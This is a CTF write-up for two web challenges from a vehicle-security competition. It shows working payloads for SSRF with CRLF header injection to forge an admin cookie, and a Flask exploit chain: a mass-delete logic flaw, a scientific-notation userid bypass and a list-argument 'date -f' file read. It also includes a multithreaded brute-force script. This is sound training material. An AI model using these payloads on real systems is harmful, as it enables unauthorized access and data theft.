Internet of Vehicles Security Championship

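One thing I noticed during this competition: my earlier writeups were not detailed enough, and I could no longer follow them myself. From now on I will write every writeup in more detail.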

WEB

Image-service

Requesting www.zip returns the source code.

index.php:

<!DOCTYPE html>
<style>
    img {
        width: 100%;
        height: 100%;
        object-flit: cover;
    }
</style>
<html>
<head>
    <title>Image Service</title>
</head>
<body>
<?php
function downloadImage($quote) {
    $ch = curl_init($quote->url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  // return the response body instead of printing it
    curl_setopt($ch, CURLOPT_HTTPHEADER, [  // custom request headers
        "Accept: */*",
        "Accept-Encoding: gzip",
        "X-From-Author: ".$quote->author   // injection point, e.g. admin\"\r\nCookie: admin=dHJ1ZQ==
    ]);
    $image = curl_exec($ch);
    curl_close($ch);
    $encodeImage = base64_encode($image);
    return "data:image/png;base64,{$encodeImage}";
}

if ($_SERVER['REQUEST_METHOD'] == 'POST') {
    $json = json_decode(file_get_contents('php://input'));
    if (strtolower(substr($json->url, 0, 7)) != 'http://' && strtolower(substr($json->url, 0, 8)) != 'https://') {
        http_response_code(400);
        echo 'url must start with http or https';
        exit(1);
    }
    $image = downloadImage($json);
    echo "<h2>Here is a random image for you:</h2>";
    echo "<img src='{$image}' />";
}

if ($_SERVER['REQUEST_METHOD'] == 'GET') {
    $img_list = ["ex9gwo", "jxyopy", "l83o92"];
    $img = $img_list[rand(0, 2)];
    $tmp = '{"url": "http://localhost/static/wallhaven-'.$img.'.png","author": "admin"}';
    $image = downloadImage (json_decode($tmp));
    echo "<h2>Here is a random image for you:</h2>";
    echo "<img src='{$image}' />";
}
?>
</body>
</html>

secret.php:

<?php
function isInternal() {
    return $_SERVER['REMOTE_ADDR'] == '127.0.0.1';
}

$admin = base64_decode($_COOKIE['admin']);

if (isInternal()) {
    if ($admin == 'true') {
        echo "Hello admin, here is your flag: " . getenv('FLAG');
    } else {
        echo "Hello guest, you are not admin";
    }
} else {
    echo "You are not internal";
}

At first glance, the downloadImage function can be used for SSRF.

However, the URL is restricted to the http/https schemes, and I could not find a way around this check:

    if (strtolower(substr($json->url, 0, 7)) != 'http://' && strtolower(substr($json->url, 0, 8)) != 'https://') {
        http_response_code(400);
        echo 'url must start with http or https';
        exit(1);
    }

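I then probed around through the SSRF and found nothing interesting. Looking at secret.php, direct access is blocked: only requests coming from 127.0.0.1 are allowed. (The methods found online for bypassing $_SERVER['REMOTE_ADDR'] == '127.0.0.1' essentially all come down to SSRF.)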

function isInternal() {
    return $_SERVER['REMOTE_ADDR'] == '127.0.0.1';
}

So I requested secret.php through the SSRF:

{"url":"http://127.0.0.1/secret.php"}

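1. The request also has to carry a Cookie named admin whose value base64-decodes to true, so the value to send is dHJ1ZQ== (base64 is an encoding, not encryption).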

2. Looking further at downloadImage, CRLF injection in the http URL itself (%0d%0a) did not work, and redirecting through a remote file is not possible either.

(If curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); were set, the URL could point at a remote file that redirects to the gopher or dict protocol. A challenge in 0xGame worked that way.)

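3. $quote->author is concatenated directly into the X-From-Author header, so a CRLF inside author breaks out of that header and lets us inject a Cookie header of our own.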

    curl_setopt($ch, CURLOPT_HTTPHEADER, [ 
        "Accept: */*",
        "Accept-Encoding: gzip",
        "X-From-Author: ".$quote->author   
    ]);

Final payload:

{
    "url": "http://127.0.0.1/secret.php",
    "author": "admin\"\r\nCookie: admin=dHJ1ZQ=="
}
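The header breakout can be reproduced offline. The following is a minimal Python sketch, not the challenge code: build_header_lines is a hypothetical helper that mirrors the header list from index.php, and it assumes the HTTP client sends header values unmodified, which is what the working payload suggests libcurl does here.

```python
import base64


def build_header_lines(author):
    """Mimic the header list built in downloadImage (illustrative helper only)."""
    headers = [
        "Accept: */*",
        "Accept-Encoding: gzip",
        "X-From-Author: " + author,  # same concatenation as in index.php
    ]
    # On the wire, header lines are separated by CRLF, so a CRLF inside a
    # value is indistinguishable from a real line break.
    return "\r\n".join(headers).split("\r\n")


# secret.php base64-decodes the admin cookie and compares it with 'true'.
cookie_value = base64.b64encode(b"true").decode()

# Same string the JSON payload decodes to: admin"<CR><LF>Cookie: admin=...
author = 'admin"\r\nCookie: admin=' + cookie_value
header_lines = build_header_lines(author)

for line in header_lines:
    print(line)
```

The last printed line is a standalone Cookie header, which is exactly what secret.php reads from $_COOKIE['admin'].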

login

This is a reused challenge (original writeup: https://ctftime.org/writeup/37931).

Let's walk through it following the original writeup.

app.py:

from flask import Flask, request, make_response, render_template, redirect, url_for
import json
from uuid import uuid4 as uuid
from Userdb import UserDB
import subprocess

app = Flask(__name__,
            static_url_path='/static',
            static_folder='static',)

userdb = UserDB("userdb.json")
userdb.add_user("admin@login.com", 9_001_0001, str(uuid()))


def delete_accs(emails):
    for email in emails:
        userdb.delete_user(email)
    return True


def error_msg(msg):
    resp = {
        "return": "Error",
        "message": msg
    }
    return json.dumps(resp)


def success_msg(msg):
    resp = {
        "return": "Success",
        "message": msg
    }
    return json.dumps(resp)


def get_user(request):
    auth = request.cookies.get("auth")
    if auth is not None:
        return userdb.authenticate_user(auth)
    return None


def validate_command(string):
    return len(string) == 4 and string.index("date") == 0


def api_create_account(data, user):
    dt = data["data"]
    email = dt["email"]   # user-supplied email
    password = dt["password"]
    groupid = dt["groupid"]
    userid = dt["userid"]

    if email == "admin@login.com":
        return error_msg("cant create admin")  # the admin email cannot be registered directly

    assert (len(groupid) == 3)
    assert (len(userid) == 4)

    userid = json.loads("1" + groupid + userid)

    if userdb.add_user(email, userid, password):
        return success_msg("User Created")
    else:
        return error_msg("User creation failed")


def api_delete_account(data, user):
    if user is None:
        return error_msg("not logged in")

    if data["data"]["email"] != user["email"]:
        return error_msg("Hey thats not your email!")

    if delete_accs(data["data"].values()):
        return success_msg("deleted account")


def api_edit_account(data, user):
    if user is None:
        return error_msg("not logged in")

    new = data["data"]["email"]

    if userdb.change_user_mail(user["email"], new):
        return success_msg("Success")
    else:
        return error_msg("Fail")


def api_login(data, user):
    if user is not None:
        return error_msg("already logged in")

    c = userdb.login_user(data["data"]["email"], data["data"]["password"])
    if c is None:
        return error_msg("Wrong User or Password")
    resp = make_response(success_msg("logged in"))
    resp.set_cookie("auth", c)
    return resp


def api_logout(data, user):
    if user is None:
        return error_msg("Already Logged Out")

    userdb[user["email"]]["cookie"] = ""
    userdb.save_db()

    return True


def api_error(data, user):
    return error_msg("General Error")


def api_admin(data, user):
    if user is None:
        return error_msg("Not logged in")
    is_admin = userdb.is_admin(user["email"])
    if not is_admin:
        return error_msg("User is not Admin")

    cmd = data["data"]["cmd"]
    if validate_command(cmd):
        out = subprocess.run(cmd, stdout=subprocess.PIPE,
                             stderr=subprocess.STDOUT)    # cmd comes straight from the request body
        return success_msg(out.stdout.decode())

    return error_msg("invalid command")


actions = {
    "delete_account": api_delete_account,
    "create_account": api_create_account,
    "edit_account": api_edit_account,
    "login": api_login,
    "logout": api_logout,
    "error": api_error,
    "admin": api_admin,
}


@app.route("/json_api", methods=["GET", "POST"])
def json_api():
    user = get_user(request)
    if request.method == "POST":
        data = json.loads(request.get_data().decode())
        action = data.get("action")
        if action is None:
            return "missing action"

        return actions.get(action, api_error)(data, user)

    else:
        return json.dumps(user)


@app.route("/")
def home():
    user = get_user(request)
    if user is not None:
        return redirect(url_for("user"))
    return render_template('home.html', title="Home", user=None)


@app.route("/login")
def login():
    user = get_user(request)
    if user is not None:
        return redirect(url_for("user"))
    return render_template('login.html', title="Login", user=None)


@app.route("/signup")
def signup():
    user = get_user(request)
    if user is not None:
        return redirect(url_for("user"))
    return render_template('signup.html', title="Signup", user=None)


@app.route("/admin")
def admin():
    user = get_user(request)
    if user is None:
        return redirect(url_for("login"))
    is_admin = userdb.is_admin(user["email"])
    if not is_admin:
        return redirect(url_for("user"))
    return render_template('admin.html', title="Admin", user=user)


@app.route("/user")
def user():
    user = get_user(request)
    if user is None:
        return redirect(url_for("login"))
    is_admin = userdb.is_admin(user["email"])
    return render_template('user.html', title="User Page", user=user, is_admin=is_admin)


@app.route("/usersettings")
def settings():
    user = get_user(request)
    if user is None:
        return redirect(url_for("login"))
    return render_template('usersettings.html', title="User Settings", user=user)


app.run(host='0.0.0.0', port=5000, debug=False)

Userdb.py:

import json
from uuid import uuid4 as uuid
import hashlib


class UserDB:
    def __init__(self, filename):
        self.db_file = filename

        with open(self.db_file, "r+") as f:
            if len(f.read()) == 0:
                f.write("{}")

        self.db = self.get_data()

    def get_data(self):
        with open(self.db_file, "r") as f:
            return json.loads(f.read())

    def save_db(self):
        with open(self.db_file, "w") as f:
            f.write(json.dumps(self.db))
        self.db = self.get_data()

    def login_user(self, email, password):
        user = self.db.get(email)
        if user is None:
            return None

        if user["password"] == hashlib.sha256(password.encode()).hexdigest():
            self.db[email]["cookie"] = str(uuid())
            self.save_db()
            return self.db[email]["cookie"]

        return None

    def authenticate_user(self, cookie):
        for k in self.db:
            dbcookie = self.db[k]["cookie"]
            if dbcookie != "" and cookie == dbcookie:
                return self.db[k]

        return None

    def is_admin(self, email):
        user = self.db.get(email)
        if user is None:
            return False
        return user["email"] == "admin@login.com" and user["userid"] > 90000000   # both conditions must hold

    def add_user(self, email, userid, password):
        user = {
            "email": email,
            "userid": userid,
            "password": hashlib.sha256(password.encode()).hexdigest(),
            "cookie": ""
        }

        if self.db.get(email) is None:
            for k in self.db:
                if self.db[k]["userid"] == userid:
                    return False
        else:
            return False

        self.db[email] = user
        self.save_db()

        return True

    def delete_user(self, email):
        if self.db.get(email) is None:
            print("user doesnt exist")
            return False
        del self.db[email]
        self.save_db()
        return True

    def change_user_mail(self, old, new):
        user = self.db.get(old)
        if user is None:
            return False
        if self.db.get(new) is not None:
            print("account exists")
            return False

        user["email"] = new
        del self.db[old]
        self.db[new] = user
        self.save_db()
        return True

The logic of this challenge is long, so let's take it one step at a time.

First, look at api_admin:

def api_admin(data, user):
    if user is None:
        return error_msg("Not logged in")
    is_admin = userdb.is_admin(user["email"])
    if not is_admin:
        return error_msg("User is not Admin")

    cmd = data["data"]["cmd"]
    if validate_command(cmd):
        out = subprocess.run(cmd, stdout=subprocess.PIPE,
                             stderr=subprocess.STDOUT)    # cmd comes straight from the request body
        return success_msg(out.stdout.decode())

    return error_msg("invalid command")

subprocess.run here should let us execute commands, but validate_command restricts cmd. Set that aside for now: the first job is to become admin.

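There are many routes, and the usual ideas (registering as admin directly, SQL injection) do not apply, so we start by registering a normal account. This is where our version differs from the original: there is no activation code check. The original approach is still worth describing. There, every attempt slept for 20 seconds to prevent brute-forcing the 4-digit activation code, so the original writeup uses a superpermutation-style string to match the code. The original script is reproduced below (for background on superpermutations, see https://en.wikipedia.org/wiki/Superpermutation).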

import requests
import random
import threading

base_url = 'https://5ae393509ccec98005d31b00-1024-cybercrime-society-club-germany.challenge.master.camp.allesctf.net:31337'
userid = '8476'
groupid = '001'
email = f'{userid}@abcde.com'


def make_account(email, password, groupid, userid):
    # create a long activation code
    activation = '1234567890135791246801470258136959384950162738'
    activation += activation[::-1]  # append the reversed string (str(reversed(...)) would only append the object's repr)

    url = f'{base_url}/json_api'

    response = requests.post(url, json={
        'action': 'create_account',
        'data': {
            'email': email,
            'password': password,
            'groupid': groupid,
            'userid': userid,
            'activation': activation
        }
    })

    # return None if and only if the account wasn't created
    result = response.json()
    if 'return' in result:
        if result['return'] == 'Error':
            if 'message' in result and result['message'] != "Activation Code Wrong":
                print('\nUnexpected error in response:', response.text)
            return None
        else:
            return result
    return None

print(f'Making account with userid {userid} and email {email}')
found = False

def attempt():
    # try to create an account 10 times
    # (each try takes 20 seconds)
    global found
    for try_number in range(10):
        if found:
            return
        result = make_account(email, '1234', groupid, str(userid))
        if result is not None:
            found = True
            print('*', end='', flush=True)
        else:    
            print(try_number, end='', flush=True)

# run attempt() once in each of 20 threads
num_threads = 20
threads = []

for num_thread in range(num_threads):
    thread = threading.Thread(target=attempt)
    thread.start()
    threads.append(thread)

for thread in threads:
    thread.join()


if found:
    print('\nSuccess!')
else:
    print('\nFailure')

In our version of the challenge, registering directly just works.

After registering and logging in, besides logout, the edit_account and delete_account actions are also available.

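delete_account only checks that data["data"]["email"] matches the current user's email, but it then loops over every value in data["data"] and deletes each one. A small trick is enough to bypass the check: add an extra key holding the admin's email, and the admin account gets deleted as well. After that we can create an admin of our own. Because api_create_account rejects admin@login.com, the address has to be taken over by registering under another email and renaming it with edit_account once the admin entry is gone.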

def api_delete_account(data, user):
    if user is None:
        return error_msg("not logged in")

    if data["data"]["email"] != user["email"]:
        return error_msg("Hey thats not your email!")

    if delete_accs(data["data"].values()):
        return success_msg("deleted account")

def delete_accs(emails):
    for email in emails:
        userdb.delete_user(email)
    return True

Userdb.py:

def delete_user(self, email):
    if self.db.get(email) is None:
        print("user doesnt exist")
        return False
    del self.db[email]
    self.save_db()
    return True

Bypass payload. Here "email":"8476@abcde.com" is the normal account we registered ourselves, and the second value is the admin's email:

{"action":"delete_account","data":{"email":"8476@abcde.com", "other_email": "admin@login.com"}}
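To see why the extra key works, here is a minimal in-memory sketch of the same logic. It is an illustration under assumptions, not the server code: the database is a plain dict, and both functions take it as an explicit argument. The admin email is the one from app.py.

```python
def delete_accs(db, emails):
    # Same shape as delete_accs in app.py: every value is treated as an email.
    for email in emails:
        db.pop(email, None)
    return True


def api_delete_account(db, data, user):
    # Only the "email" key is compared against the logged-in user...
    if data["data"]["email"] != user["email"]:
        return "Hey thats not your email!"
    # ...but ALL values of data["data"] are deleted.
    delete_accs(db, data["data"].values())
    return "deleted account"


db = {
    "8476@abcde.com": {"email": "8476@abcde.com"},
    "admin@login.com": {"email": "admin@login.com"},
}
me = db["8476@abcde.com"]

payload = {
    "action": "delete_account",
    "data": {"email": "8476@abcde.com", "other_email": "admin@login.com"},
}
result = api_delete_account(db, payload, me)
print(result, db)
```

Note that our own account is deleted together with the admin, so a fresh account has to be registered for the following steps.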

To be recognised as admin, userid must also be greater than 90000000:

Userdb.py:

def is_admin(self, email):
    user = self.db.get(email)
    if user is None:
        return False

    #TODO check userid type etc
    return user["email"] == "admin@login.com" and user["userid"] > 90000000

app.py:

def api_create_account(data, user):
    # [...]

    groupid = dt["groupid"]
    userid=dt["userid"]
    
    # [...]

    assert(len(groupid) == 3)
    assert(len(userid) == 4)

    userid = json.loads("1" + groupid + userid)

    # [...]

    if userdb.add_user(email, userid, password):
        # [...]

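No matter how the digits are concatenated, the number is never large enough: "1" followed by 3 + 4 digits is at most 19999999. Scientific notation gets around this: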

userid = json.loads("1" + groupid + userid)

>>> json.loads('1'+'000'+'0000') > 90_000_000
False

>>> json.loads('1'+'e10'+'    ') > 90_000_000
True
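The arithmetic can be checked with a small sketch. build_userid is a hypothetical helper that copies the two length assertions and the json.loads call from api_create_account; everything else is just comparison against the is_admin threshold.

```python
import json

THRESHOLD = 90_000_000  # value compared against in is_admin


def build_userid(groupid, userid):
    # Same checks and concatenation as api_create_account.
    assert len(groupid) == 3
    assert len(userid) == 4
    return json.loads("1" + groupid + userid)


# Largest value reachable with plain digits: 1 + 999 + 9999.
largest_plain = build_userid("999", "9999")

# "e10" turns the literal into 1e10; the four spaces are trailing
# whitespace, which json.loads accepts.
scientific = build_userid("e10", "    ")

print(largest_plain, largest_plain > THRESHOLD)
print(scientific, scientific > THRESHOLD)
```

The resulting userid is a float rather than an int, which is_admin does not check.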

That brings us to the final step: reading the flag.

def api_admin(data, user):
    if user is None:
        return error_msg("Not logged in")
    is_admin = userdb.is_admin(user["email"])
    if not is_admin:
        return error_msg("User is not Admin")

    cmd = data["data"]["cmd"]
    # currently only "date" is supported
    if validate_command(cmd):
        out = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
        return success_msg(out.stdout.decode())


    return error_msg("invalid command")

data["data"]["cmd"] must have length 4, and "date" must be found at index 0, so this is clearly not meant to be plain command execution.

def validate_command(string):
    return len(string) == 4 and string.index("date") == 0

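subprocess.run(args) also accepts a list: the first element is the program to run, and the remaining elements are passed as its command-line arguments. A four-element list whose first element is "date" therefore passes validate_command, but we still have to make date reveal the flag. Reading the date help, -f filename makes date parse every line of the file as a date string, and a line that is not a valid date is echoed back in the error message (stderr is merged into stdout here). That only uses 3 elements, so we need a fourth option that takes no argument, and -u fits.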

$ date --help
Usage: date [OPTION]... [+FORMAT]
  or:  date [-u|--utc|--universal] [MMDDhhmm[[CC]YY][.ss]]
Display date and time in the given FORMAT.
With -s, or with [MMDDhhmm[[CC]YY][.ss]], set the date and time.

Mandatory arguments to long options are mandatory for short options too.
  -d, --date=STRING          display time described by STRING, not 'now'
      --debug                annotate the parsed date,
                              and warn about questionable usage to stderr
  -f, --file=DATEFILE        like --date; once for each line of DATEFILE
  -I[FMT], --iso-8601[=FMT]  output date/time in ISO 8601 format.
                               FMT='date' for date only (the default),
                               'hours', 'minutes', 'seconds', or 'ns'
                               for date and time to the indicated precision.
                               Example: 2006-08-14T02:34:56-06:00
  --resolution               output the available resolution of timestamps
                               Example: 0.000000001
  -R, --rfc-email            output date and time in RFC 5322 format.
                               Example: Mon, 14 Aug 2006 02:34:56 -0600
      --rfc-3339=FMT         output date/time in RFC 3339 format.
                               FMT='date', 'seconds', or 'ns'
                               for date and time to the indicated precision.
                               Example: 2006-08-14 02:34:56-06:00
  -r, --reference=FILE       display the last modification time of FILE
  -s, --set=STRING           set time described by STRING
  -u, --utc, --universal     print or set Coordinated Universal Time (UTC)
      --help        display this help and exit
      --version     output version information and exit

The final requests look like this:

{"action":"admin","data":{"cmd":"date"}}
{"action":"admin","data":{"cmd":["date", "-f", "flag.txt", "-u"]}}
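Both request bodies pass the same check because len() and index() work on strings and lists alike. A short sketch, reusing validate_command exactly as it appears in app.py (the rejected example list is made up for illustration):

```python
def validate_command(string):
    # Copied from app.py: works on any sequence with len() and index().
    return len(string) == 4 and string.index("date") == 0


as_string = "date"                             # 4 characters, "date" found at offset 0
as_list = ["date", "-f", "flag.txt", "-u"]     # 4 elements, "date" is element 0
rejected = ["cat", "flag.txt", "x", "date"]    # "date" is present but at index 3

print(validate_command(as_string))
print(validate_command(as_list))
print(validate_command(rejected))
```

With the list form, subprocess.run executes date with the three remaining elements as arguments, without involving a shell.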

And that yields the flag.
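Putting the steps together, the whole chain can be written down as an ordered list of /json_api request bodies. This is a sketch under assumptions: the ordering is my reading of app.py rather than a captured session, the password is made up, and the throwaway email is simply re-registered after it has been deleted. Nothing is sent over the network; the code only builds the JSON bodies.

```python
import json

ATTACKER = "8476@abcde.com"   # throwaway account used earlier in this writeup
ADMIN = "admin@login.com"     # admin email from app.py
PASSWORD = "1234"             # hypothetical password


def step(action, **data):
    """Build one /json_api request body."""
    return json.dumps({"action": action, "data": data})


steps = [
    # 1. Register and log in with a normal account.
    step("create_account", email=ATTACKER, password=PASSWORD, groupid="001", userid="8476"),
    step("login", email=ATTACKER, password=PASSWORD),
    # 2. Delete our own account and the admin in one request.
    step("delete_account", email=ATTACKER, other_email=ADMIN),
    # 3. Register again with a userid that parses as 1e10.
    step("create_account", email=ATTACKER, password=PASSWORD, groupid="e10", userid="    "),
    step("login", email=ATTACKER, password=PASSWORD),
    # 4. Rename the new account to the now-free admin email.
    step("edit_account", email=ADMIN),
    # 5. Run date with a file argument so the flag shows up in the error output.
    step("admin", cmd=["date", "-f", "flag.txt", "-u"]),
]

for body in steps:
    print(body)
```

The auth cookie returned by each login has to be sent with the requests that follow it.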

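Verdict: as an original challenge this would be really impressive. The logic chain is long and no single step is hard, but auditing all of it and working out every bypass still takes quite a few tricks.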